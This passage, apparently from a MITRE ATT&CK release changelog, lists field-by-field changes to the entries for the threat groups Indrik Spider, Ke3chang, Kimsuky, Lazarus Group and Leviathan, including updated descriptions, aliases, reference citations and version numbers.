| description | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that as been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019) |
| x_mitre_version | 2.0 | 2.1 |
| Old Description | New Description |
|---|---|
| [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) | [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Pooja Natarajan, NEC Corporation India', 'Manikantan Srinivasan, NEC Corporation India', 'Hiroki Nagahama, NEC Corporation'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-01 21:12:15.839000+00:00 | 2022-07-22 18:52:32.762000+00:00 |
| description | [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) | [Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021) |
| external_references[1]['source_name'] | Ke3chang | RoyalAPT |
| external_references[1]['description'] | (Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) | (Citation: APT15 Intezer June 2018) |
| external_references[2]['source_name'] | APT15 | NICKEL |
| external_references[2]['description'] | (Citation: NCC Group APT15 Alive and Strong) | (Citation: Microsoft NICKEL December 2021) |
| external_references[3]['source_name'] | Mirage | APT15 |
| external_references[4]['source_name'] | Vixen Panda | Mirage |
| external_references[4]['description'] | (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) | (Citation: NCC Group APT15 Alive and Strong) |
| external_references[6]['source_name'] | Playful Dragon | Vixen Panda |
| external_references[6]['description'] | (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) | (Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) |
| external_references[7]['source_name'] | RoyalAPT | Playful Dragon |
| external_references[7]['description'] | (Citation: APT15 Intezer June 2018) | (Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018) |
| external_references[8]['source_name'] | Mandiant Operation Ke3chang November 2014 | Ke3chang |
| external_references[8]['description'] | Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014. | (Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018) |
| external_references[9]['source_name'] | NCC Group APT15 Alive and Strong | Microsoft NICKEL December 2021 |
| external_references[9]['description'] | Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018. | MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022. |
| external_references[9]['url'] | https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ | https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe |
| external_references[10]['url'] | https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ | https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ |
| x_mitre_version | 1.4 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | NICKEL | |
| external_references | {'source_name': 'NCC Group APT15 Alive and Strong', 'description': 'Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.', 'url': 'https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/'} | |
| external_references | {'source_name': 'Mandiant Operation Ke3chang November 2014', 'description': 'Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.', 'url': 'https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs'} | |
| external_references | {'source_name': 'Villeneuve et al 2014', 'description': 'Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf'} | |
| Description |
|---|
| [Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky) [Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Taewoo Lee, KISA', 'Dongwook Kim, KISA'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:35:20.109000+00:00 | 2022-05-24 16:28:34.698000+00:00 |
| external_references[1]['source_name'] | Kimsuky | Thallium |
| external_references[1]['description'] | (Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021) | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) |
| external_references[2]['source_name'] | STOLEN PENCIL | Black Banshee |
| external_references[2]['description'] | (Citation: Netscout Stolen Pencil Dec 2018) | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) |
| external_references[3]['source_name'] | Thallium | STOLEN PENCIL |
| external_references[3]['description'] | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) | (Citation: Netscout Stolen Pencil Dec 2018) |
| external_references[4]['source_name'] | Black Banshee | Kimsuky |
| external_references[4]['description'] | (Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021) | (Citation: Securelist Kimsuky Sept 2013)(Citation: Malwarebytes Kimsuky June 2021) |
| external_references[6]['source_name'] | EST Kimsuky April 2019 | AhnLab Kimsuky Kabar Cobra Feb 2019 |
| external_references[6]['description'] | Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019. | AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021. |
| external_references[6]['url'] | https://blog.alyac.co.kr/2234 | https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf |
| external_references[7]['source_name'] | BRI Kimsuky April 2019 | EST Kimsuky April 2019 |
| external_references[7]['description'] | BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019. | Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019. |
| external_references[7]['url'] | https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/ | https://blog.alyac.co.kr/2234 |
| external_references[8]['source_name'] | Cybereason Kimsuky November 2020 | Netscout Stolen Pencil Dec 2018 |
| external_references[8]['description'] | Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. | ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019. |
| external_references[8]['url'] | https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite | https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/ |
| external_references[9]['source_name'] | Malwarebytes Kimsuky June 2021 | BRI Kimsuky April 2019 |
| external_references[9]['description'] | Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. | BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019. |
| external_references[9]['url'] | https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/ | https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/ |
| external_references[10]['source_name'] | CISA AA20-301A Kimsuky | Zdnet Kimsuky Dec 2018 |
| external_references[10]['description'] | CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020. | Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019. |
| external_references[10]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa20-301a | https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/ |
| external_references[11]['source_name'] | Netscout Stolen Pencil Dec 2018 | CISA AA20-301A Kimsuky |
| external_references[11]['description'] | ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019. | CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020. |
| external_references[11]['url'] | https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/ | https://us-cert.cisa.gov/ncas/alerts/aa20-301a |
| external_references[12]['source_name'] | EST Kimsuky SmokeScreen April 2019 | Cybereason Kimsuky November 2020 |
| external_references[12]['description'] | ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021. | Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020. |
| external_references[12]['url'] | https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf | https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite |
| external_references[13]['source_name'] | AhnLab Kimsuky Kabar Cobra Feb 2019 | EST Kimsuky SmokeScreen April 2019 |
| external_references[13]['description'] | AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021. | ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021. |
| external_references[13]['url'] | https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf | https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf |
| external_references[14]['source_name'] | Securelist Kimsuky Sept 2013 | Malwarebytes Kimsuky June 2021 |
| external_references[14]['description'] | Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019. | Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. |
| external_references[14]['url'] | https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/ | https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/ |
| external_references[15]['source_name'] | Zdnet Kimsuky Dec 2018 | Securelist Kimsuky Sept 2013 |
| external_references[15]['description'] | Cimpanu, C.. (2018, December 5). Cyber-espionage group uses Chrome extension to infect victims. Retrieved August 26, 2019. | Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019. |
| external_references[15]['url'] | https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/ | https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/ |
| x_mitre_version | 3.0 | 3.1 |
| Description |
|---|
| [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Kyaw Pyiyt Htet, @KyawPyiytHtet', 'Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/ | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:04:58.182000+00:00 | 2022-08-23 15:30:44.196000+00:00 |
| external_references[1]['source_name'] | Lazarus Group | Labyrinth Chollima |
| external_references[1]['description'] | (Citation: Novetta Blockbuster) | (Citation: CrowdStrike Labyrinth Chollima Feb 2022) |
| external_references[2]['source_name'] | HIDDEN COBRA | ZINC |
| external_references[2]['description'] | The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019) | (Citation: Microsoft ZINC disruption Dec 2017) |
| external_references[3]['source_name'] | Guardians of Peace | Lazarus Group |
| external_references[3]['description'] | (Citation: US-CERT HIDDEN COBRA June 2017) | (Citation: Novetta Blockbuster) |
| external_references[4]['source_name'] | ZINC | NICKEL ACADEMY |
| external_references[4]['description'] | (Citation: Microsoft ZINC disruption Dec 2017) | (Citation: Secureworks NICKEL ACADEMY Dec 2017) |
| external_references[5]['source_name'] | NICKEL ACADEMY | Guardians of Peace |
| external_references[5]['description'] | (Citation: Secureworks NICKEL ACADEMY Dec 2017) | (Citation: US-CERT HIDDEN COBRA June 2017) |
| external_references[6]['source_name'] | US-CERT HIDDEN COBRA June 2017 | CrowdStrike Labyrinth Chollima Feb 2022 |
| external_references[6]['description'] | US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017. | CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022. |
| external_references[6]['url'] | https://www.us-cert.gov/ncas/alerts/TA17-164A | https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/ |
| external_references[7]['source_name'] | Treasury North Korean Cyber Groups September 2019 | Novetta Blockbuster |
| external_references[7]['description'] | US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[7]['url'] | https://home.treasury.gov/news/press-releases/sm774 | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| external_references[8]['source_name'] | Novetta Blockbuster | Secureworks NICKEL ACADEMY Dec 2017 |
| external_references[8]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017. |
| external_references[8]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing |
| external_references[9]['source_name'] | US-CERT HOPLIGHT Apr 2019 | Microsoft ZINC disruption Dec 2017 |
| external_references[9]['description'] | US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019. | Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017. |
| external_references[9]['url'] | https://www.us-cert.gov/ncas/analysis-reports/AR19-100A | https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/ |
| external_references[10]['source_name'] | Microsoft ZINC disruption Dec 2017 | HIDDEN COBRA |
| external_references[10]['description'] | Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017. | The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019) |
| external_references[11]['source_name'] | Secureworks NICKEL ACADEMY Dec 2017 | Treasury North Korean Cyber Groups September 2019 |
| external_references[11]['description'] | Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017. | US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021. |
| external_references[11]['url'] | https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing | https://home.treasury.gov/news/press-releases/sm774 |
| x_mitre_version | 2.0 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Labyrinth Chollima | |
| external_references | {'source_name': 'US-CERT HIDDEN COBRA June 2017', 'description': 'US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA17-164A'} | |
| external_references | {'source_name': 'US-CERT HOPLIGHT Apr 2019', 'description': 'US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.', 'url': 'https://www.us-cert.gov/ncas/analysis-reports/AR19-100A'} | |
| Description |
|---|
| [Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.crowdstrike.com/blog/two-birds-one-stone-panda/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:34:57.289000+00:00 | 2022-04-15 15:15:51.198000+00:00 |
| external_references[1]['source_name'] | Leviathan | MUDCARP |
| external_references[1]['description'] | (Citation: Proofpoint Leviathan Oct 2017) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019) |
| external_references[2]['source_name'] | MUDCARP | Kryptonite Panda |
| external_references[2]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018) |
| external_references[3]['source_name'] | Kryptonite Panda | Gadolinium |
| external_references[3]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020) |
| external_references[4]['source_name'] | Gadolinium | BRONZE MOHAWK |
| external_references[4]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020) | (Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.) |
| external_references[5]['source_name'] | BRONZE MOHAWK | Leviathan |
| external_references[5]['description'] | (Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.) | (Citation: Proofpoint Leviathan Oct 2017) |
| external_references[6]['description'] | Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019) | [Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019) |
| external_references[7]['source_name'] | APT40 | TEMP.Periscope |
| external_references[7]['description'] | FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) | [Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) |
| external_references[8]['source_name'] | TEMP.Periscope | Accenture MUDCARP March 2019 |
| external_references[8]['description'] | Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) | Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021. |
| external_references[9]['source_name'] | CISA AA21-200A APT40 July 2021 | Crowdstrike KRYPTONITE PANDA August 2018 |
| external_references[9]['description'] | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021. | Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021. |
| external_references[9]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa21-200a | https://www.crowdstrike.com/blog/two-birds-one-stone-panda/ |
| external_references[11]['source_name'] | FireEye Periscope March 2018 | MSTIC GADOLINIUM September 2020 |
| external_references[11]['description'] | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. | Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021. |
| external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html | https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ |
| external_references[12]['source_name'] | Accenture MUDCARP March 2019 | CISA AA21-200A APT40 July 2021 |
| external_references[12]['description'] | Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021. | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021. |
| external_references[12]['url'] | https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies | https://us-cert.cisa.gov/ncas/alerts/aa21-200a |
| external_references[13]['source_name'] | Crowdstrike KRYPTONITE PANDA August 2018 | APT40 |
| external_references[13]['description'] | Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021. | FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019) |
| external_references[14]['source_name'] | MSTIC GADOLINIUM September 2020 | FireEye Periscope March 2018 |
| external_references[14]['description'] | Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021. | FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. |
| external_references[14]['url'] | https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/ | https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html |
| external_references[15]['source_name'] | SecureWorks BRONZE MOHAWK n.d. | FireEye APT40 March 2019 |
| external_references[15]['description'] | SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021. | Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019. |
| external_references[15]['url'] | https://www.secureworks.com/research/threat-profiles/bronze-mohawk | https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html |
| external_references[16]['source_name'] | FireEye APT40 March 2019 | SecureWorks BRONZE MOHAWK n.d. |
| external_references[16]['description'] | Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019. | SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021. |
